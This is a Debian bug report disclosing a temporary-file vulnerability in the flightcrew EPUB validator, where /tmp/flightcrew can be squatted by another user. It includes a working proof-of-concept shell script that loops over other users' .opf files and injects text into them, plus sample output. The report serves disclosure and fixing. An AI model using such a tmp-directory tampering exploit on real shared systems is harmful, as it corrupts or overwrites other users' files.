Package: flightcrew
Version: 0.7.2+dfsg-8
Tags: security

flightcrew creates temporary files in /tmp/flightcrew/, even when this directory belongs to another user. A malicious user could exploit this to tamper with other users' temporary files; probably also to overwrite arbitrary files via a symlink attack.

I've attached a proof-of-concept exploit. When it is running, all users will be getting spurious validation errors:

$ whoami
jwilk
$ ls -ld /tmp/flightcrew/
drwxrwxrwx+ 3 mallory mallory 60 May 6 22:58 /tmp/flightcrew/
$ flightcrew-cli EpubValidates_Valid.epub
EpubValidates_Valid.epub/OEBPS/content.opf(2): error 1105: The <package> element's "version" attribute value needs to be "2.0", but is " _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
".

-- 
Jakub Wilk

#!/bin/sh
set -e -u
mkdir -m 777 /tmp/flightcrew
cd /tmp/flightcrew
setfacl -d -m "u:$USER:rwx" .
msg=' _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
'
msg=$(printf '%s' "$msg" | sed -e 's/\\/\\\\/g' -e 's/</\\\</g' -e 's/$/\\\ /' | tr -d '\n')
while true
do
    find . -type f -name '*.opf' -exec sed -i -r -e '/<[?]/b' -e "s@version=(\"[^\"]+\"|'[^']+')@version=\"$msg\"@" {} + || true
done